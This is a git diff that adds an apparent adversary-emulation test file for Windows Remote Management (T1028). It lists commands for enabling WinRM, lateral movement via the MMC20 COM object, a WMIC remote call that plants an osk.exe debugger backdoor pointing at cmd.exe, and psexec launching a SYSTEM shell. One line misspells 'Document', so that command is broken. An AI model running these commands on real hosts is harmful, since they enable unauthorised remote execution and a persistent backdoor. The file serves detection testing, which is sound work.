diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml
new file mode 100644
index 00000000..883ae0d4
--- /dev/null
+++ b/atomics/T1028/T1028.yaml
@@ -0,0 +1,90 @@
+---
+attack_technique: T1028
+display_name: Windows Remote Management
+
+atomic_tests:
+- name: Enable Windows Remote Management
+  description: |
+    Powershell Enable WinRM
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    command: |
+      powershell Enable-PSRemoting -Force
+
+- name: PowerShell Lateral Movement
+  description: |
+    Powershell lateral movement using the mmc20 application com object
+
+    Reference:
+
+    https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    computername:
+      description: Name of Computer
+      type: string
+      default: computer1
+
+  executor:
+    name: command_prompt
+    command: |
+      powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+
+- name: WMIC Process Call Create
+  description: |
+    Utilize WMIC to start remote process
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    user_name:
+      description: Username
+      type: String
+      default: DOMAIN\Administrator
+    password:
+      description: Password
+      type: String
+      default: P@ssw0rd1
+    computer_name:
+      description: Target Computer Name
+      type: String
+      default: Target
+
+  executor:
+    name: command_prompt
+    command: |
+      wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
+
+- name: Psexec
+  description: |
+    Utilize psexec to start remote process
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    user_name:
+      description: Username
+      type: String
+      default: DOMAIN\Administrator
+    password:
+      description: Password
+      type: String
+      default: P@ssw0rd1
+    computer_name:
+      description: Target Computer Name
+      type: String
+      default: Target
+
+  executor:
+    name: command_prompt
+    command: |
+      psexec \\host -u domain\user -p password -s cmd.exe